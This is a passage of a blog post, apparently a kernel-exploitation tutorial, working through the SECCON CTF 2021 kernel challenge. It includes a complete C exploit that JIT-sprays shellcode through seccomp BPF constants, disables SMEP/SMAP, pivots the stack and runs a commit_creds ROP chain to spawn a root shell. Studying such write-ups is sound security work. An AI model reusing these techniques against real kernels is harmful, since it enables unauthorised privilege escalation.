b6 b8 mov dh, 0xb8
b7 b8 mov bh, 0xb8

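This table comes from the blog post mentioned above; the entries marked * only update flags. The most suitable byte is 0x3c, which together with 0xb8 forms cmp al, 0xb8. That makes it ideal for our misaligned code. If every immediate we pass carries 0x3c in its top byte (stored last in memory), we get: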

b8 90 90 90 3c			mov eax, 0x3c909090
b8 90 90 90 3c			mov eax, 0x3c909090
...

-------------------------------------------

90 nop
90 nop
90 nop
3c b8 cmp al, 0xb8
90 nop
...
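The byte pattern above follows from x86 encoding: mov eax, imm32 is opcode 0xb8 followed by the immediate in little-endian order. The sketch below models only that encoding. It assumes each A = k load is JIT-compiled to exactly this 5-byte instruction with nothing in between, which is the idealised picture used in this section; real JIT output also contains a prologue and epilogue. emit_loads is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of the JIT output for a run of "A = k" loads: b8 followed by k in
 * little-endian byte order, 5 bytes per instruction. Returns bytes written. */
static size_t emit_loads(const uint32_t *ks, size_t n, uint8_t *out)
{
    size_t pos = 0;

    for (size_t i = 0; i < n; i++) {
        out[pos++] = 0xb8;
        for (int b = 0; b < 4; b++)
            out[pos++] = (uint8_t)(ks[i] >> (8 * b));
    }
    return pos;
}
```

Reading the emitted buffer from out + 1 gives 90 90 90 3c b8 ..., that is, three nops followed by cmp al, 0xb8, as in the misaligned listing above.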

So we can use the three spare bytes of each instruction to hold the shellcode we want.
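Packing shellcode into those spare bytes is mechanical. Each constant holds up to three instruction bytes, padded with 0x90, and 0x3c goes in the top byte so that the following 0xb8 is swallowed by cmp al, 0xb8. A minimal sketch follows; pack_k is a hypothetical helper, and the checks reuse constants from the exploit below.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Pack 1..3 shellcode bytes into a cBPF immediate: the bytes go first
 * (little-endian), unused slots are nop (0x90), and the top byte is 0x3c. */
static uint32_t pack_k(const uint8_t *code, size_t len)
{
    uint8_t b[4] = { 0x90, 0x90, 0x90, 0x3c };

    assert(len >= 1 && len <= 3);
    for (size_t i = 0; i < len; i++)
        b[i] = code[i];
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}
```

Instructions longer than three bytes cannot be split this way. The shellcode therefore builds values from short pieces, such as xor rax, rax followed by mov ah, imm8 and mov al, imm8.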

Example: SECCON CTF 2021

First, the README.md:

Added to `arch/x86/entry/syscalls/syscall_64.tbl`
```
1337 64 seccon sys_seccon
```

Added to `kernel/sys.c`:
```c
SYSCALL_DEFINE1(seccon, unsigned long, rip)
{
asm volatile("xor %%edx, %%edx;"
"xor %%ebx, %%ebx;"
"xor %%ecx, %%ecx;"
"xor %%edi, %%edi;"
"xor %%esi, %%esi;"
"xor %%r8d, %%r8d;"
"xor %%r9d, %%r9d;"
"xor %%r10d, %%r10d;"
"xor %%r11d, %%r11d;"
"xor %%r12d, %%r12d;"
"xor %%r13d, %%r13d;"
"xor %%r14d, %%r14d;"
"xor %%r15d, %%r15d;"
"xor %%ebp, %%ebp;"
"xor %%esp, %%esp;"
"jmp %0;"
"ud2;"
: : "rax"(rip));
return 0;
}
```

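The challenge ships no vulnerable module. Instead it adds a custom system call that clears most registers, including rsp, and then jumps to the address we pass in. Because rsp is zeroed, the shellcode must set up its own stack before it can use push, pop or call.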

Next, the launch script:

#!/bin/sh
timeout --foreground 300 qemu-system-x86_64 \
-m 64M \
-nographic \
-kernel bzImage \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on nokaslr" \
-no-reboot \
-cpu kvm64,+smap,+smep \
-smp 1 \
-monitor /dev/null \
-initrd rootfs.cpio \
-net nic,model=virtio \
-net user \
-s

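KPTI, SMEP and SMAP are enabled, but KASLR is not, so we know the addresses of all kernel symbols. My first idea was ret2dir, but pivoting the stack that way is hard. With at most 3 bytes of extra instructions per slot we cannot write something like mov rsp, 0xffff8880xxxxxxxx. So instead we disable SMEP/SMAP and pivot the stack into user space.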

The first job is writing the BPF instructions. Let's check the prctl man page:

       PR_SET_SECCOMP (since Linux 2.6.23)
Set the secure computing (seccomp) mode for the calling thread, to limit the available system calls. The more recent seccomp(2) system call provides a superset of the functionality of PR_SET_SECCOMP, and is
the preferred interface for new applications.

The seccomp mode is selected via arg2. (The seccomp constants are defined in <linux/seccomp.h>.) The following values can be specified:

...

SECCOMP_MODE_FILTER (since Linux 3.5)
The allowed system calls are defined by a pointer to a Berkeley Packet Filter passed in arg3. This argument is a pointer to struct sock_fprog; it can be designed to filter arbitrary system calls and
system call arguments. See the description of SECCOMP_SET_MODE_FILTER in seccomp(2).

This operation is available only if the kernel is configured with CONFIG_SECCOMP_FILTER enabled.

So arg1, arg2 and arg3 all have specific requirements. The man page helpfully points us to seccomp(2), so let's follow it:

SECCOMP_SET_MODE_FILTER
The system calls allowed are defined by a pointer to a Berkeley Packet Filter (BPF) passed via args. This argument is a pointer to a struct sock_fprog; it can be designed to filter arbitrary system calls and
system call arguments. If the filter is invalid, seccomp() fails, returning EINVAL in errno.

If fork(2) or clone(2) is allowed by the filter, any child processes will be constrained to the same system call filters as the parent. If execve(2) is allowed, the existing filters will be preserved across a
call to execve(2).

In order to use the SECCOMP_SET_MODE_FILTER operation, either the calling thread must have the CAP_SYS_ADMIN capability in its user namespace, or the thread must already have the no_new_privs bit set. If that
bit was not already set by an ancestor of this thread, the thread must make the following call:

prctl(PR_SET_NO_NEW_PRIVS, 1);

Otherwise, the SECCOMP_SET_MODE_FILTER operation fails and returns EACCES in errno. This requirement ensures that an unprivileged process cannot apply a malicious filter and then invoke a set-user-ID or other
privileged program using execve(2), thus potentially compromising that program. (Such a malicious filter might, for example, cause an attempt to use setuid(2) to set the caller's user IDs to nonzero values to
instead return 0 without actually making the system call. Thus, the program might be tricked into retaining superuser privileges in circumstances where it is possible to influence it to do dangerous things
because it did not actually drop privileges.)


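To use this mode, one of two conditions must hold. Either the calling thread has CAP_SYS_ADMIN in its user namespace, or it has the no_new_privs bit set. The man page also gives the call that sets the bit: prctl(PR_SET_NO_NEW_PRIVS, 1).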
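Put together, an unprivileged process can install a filter as shown below. This minimal sketch installs a one-instruction allow-everything filter, so it is harmless to the calling process. install_allow_all is a hypothetical helper; the two prctl calls are the PR_SET_NO_NEW_PRIVS and PR_SET_SECCOMP/SECCOMP_MODE_FILTER pair quoted above.

```c
#include <assert.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* Install a seccomp filter whose only instruction is "return ALLOW".
 * Returns 0 on success, -1 on failure (errno set by prctl). */
static int install_allow_all(void)
{
    struct sock_filter insns[] = {
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(insns) / sizeof(insns[0])),
        .filter = insns,
    };

    /* Without CAP_SYS_ADMIN, no_new_privs must be set first (see seccomp(2)). */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0)
        return -1;
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) < 0)
        return -1;
    return 0;
}
```

The exploit's set_seccomp() follows the same sequence. The difference is the program: hundreds of A = k loads whose immediates double as shellcode once the kernel has JIT-compiled them.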

Next we can debug to see what happens. Below are the instructions we write for now, which form a simple NOP sled:

for(int i = 0; i < BPF_PROG_LEN; i++){
bpf_prog[i].code = 0x00;
bpf_prog[i].jt = 0;
bpf_prog[i].jf = 0;
bpf_prog[i].k = 0x3c909090;
}

So we can lay down a long sled and put our shellcode near the end of the program.

The shellcode does three things. It first writes CR4 to disable SMEP/SMAP, then pivots the stack to user memory, and finally runs a ROP chain.
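The two constants the shellcode builds can be sanity-checked in userland. rax is cleared with xor rax, rax, so writing ah and al afterwards yields (ah << 8) | al:

- 0x6f0 for CR4. This value has the SMEP (bit 20) and SMAP (bit 21) bits clear.
- 0x9000 for the new stack. This is exactly where fake_stack[0x1000] lives when fake_stack is mapped at 0x1000.

The helper names below are hypothetical; the values are taken from the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CR4_SMEP (1UL << 20)
#define CR4_SMAP (1UL << 21)

/* Value of rax after: xor rax, rax; mov ah, hi; mov al, lo */
static uint64_t rax_from_ah_al(uint8_t hi, uint8_t lo)
{
    return ((uint64_t)hi << 8) | lo;
}

/* User address of fake_stack[idx] for a 64-bit slot array mapped at base. */
static uint64_t slot_addr(uint64_t base, size_t idx)
{
    return base + idx * sizeof(uint64_t);
}
```

This is why the exploit starts filling the ROP chain at idx = 0x1000 instead of at the beginning of the mapping.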

The exploit:

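/* The inline asm uses Intel syntax, so build with -masm=intel, e.g. gcc -static -masm=intel -o exp exp.c */
#define _GNU_SOURCE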
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/bpf.h>
#include <linux/seccomp.h>
#include <linux/filter.h>

#define BPF_PROG_LEN (0x1780/8)
#define PAGE_SZ 4096
#define PREARE_KERNEL_CRED 0xffffffff81073c60
#define COMMIT_CREDS 0xffffffff81073ad0
#define SWAPGS_RESTORE 0xffffffff81800e26
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[+]Status has been saved....");
}

void get_shell(){
if(getuid()){
puts("[x]not root");
exit(1);
}
system("/bin/sh");
}

void set_seccomp(char *insn, unsigned int len){
struct sock_fprog{
unsigned short len;
struct sock_filter *filter;
}prog;
prog.len = len;
prog.filter = (struct sock_filter *)insn;
if(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0){
perror("prepare prctl failed!");
exit(1);
}
if(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) < 0){
perror("SET_SECCOMP");
exit(-1);
}
}

void seccon(unsigned long rip){
syscall(1337, rip);
}

void debug(void){
printf("[+]Debugging here!");
getchar();
}


int main(void){
size_t *fake_stack;
size_t start;
int idx;
struct sock_filter* bpf_prog = (struct sock_filter *)malloc(BPF_PROG_LEN * sizeof(struct sock_filter));
save_status();
for(int i = 0; i < BPF_PROG_LEN; i++){
bpf_prog[i].code = 0x00;
bpf_prog[i].jt = 0;
bpf_prog[i].jf = 0;
bpf_prog[i].k = 0x3c909090;
}

bpf_prog[BPF_PROG_LEN - 1].code = 0x06;
bpf_prog[BPF_PROG_LEN - 1].jt = 0;
bpf_prog[BPF_PROG_LEN - 1].jf = 0;
bpf_prog[BPF_PROG_LEN - 1].k = 0x7fff0000;

start = BPF_PROG_LEN - 0x100;
//xor rax,rax;mov ah,0x06;mov al,0xf0;mov cr4,rax
bpf_prog[start++].k = 0x3cc03148;
bpf_prog[start++].k = 0x3c9006b4;
bpf_prog[start++].k = 0x3c90f0b0;
bpf_prog[start++].k = 0x3ce0220f;

//xor rax,rax; mov ah,0x90; mov al,0x00; mov rsp, rax   (rsp = 0x9000 = &fake_stack[0x1000])
bpf_prog[start++].k = 0x3cc03148;
bpf_prog[start++].k = 0x3c9090b4;
bpf_prog[start++].k = 0x3c9000b0;

bpf_prog[start++].k = 0x3cc48948;

//push 0; pop rdi; call [rsp]; pop rdx; nop; nop; push rax; pop rdi;ret
bpf_prog[start++].k = 0x3c5f006a;
bpf_prog[start++].k = 0x3c2414ff;
bpf_prog[start++].k = 0x3c90905a;
bpf_prog[start++].k = 0x3cc35f50;

set_seccomp((char *)bpf_prog, BPF_PROG_LEN);
fake_stack = mmap((void *)0x1000, PAGE_SZ*16, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
memset(fake_stack, '\x00', PAGE_SZ*16);
idx = 0x1000;
fake_stack[idx++] = PREARE_KERNEL_CRED;
fake_stack[idx++] = COMMIT_CREDS;
fake_stack[idx++] = SWAPGS_RESTORE;
fake_stack[idx++] = 0xdeadbeef;
fake_stack[idx++] = 0xdeadbeef;
fake_stack[idx++] = (size_t)get_shell;
fake_stack[idx++] = user_cs;
fake_stack[idx++] = user_rflags;
fake_stack[idx++] = user_sp + 8;
fake_stack[idx++] = user_ss;

sleep(1);
seccon(0xffffffffc00009b1);
}

Final. References

https://arttnba3.cn/

https://blingblingxuanxuan.github.io/

https://kiprey.gitee.io/2021/10/kernel_pwn_introduction/

http://blog.jcix.top/2018-10-01/userfaultfd_intro/

https://www.willsroot.io/

https://www.anquanke.com/post/id/263803


Linux-Kernel-0x02-Practice
https://peiandhao.github.io/2023/06/24/Linux-Kernel-0x02-Practice/
Author
peiwithhao
Published on
June 24, 2023
License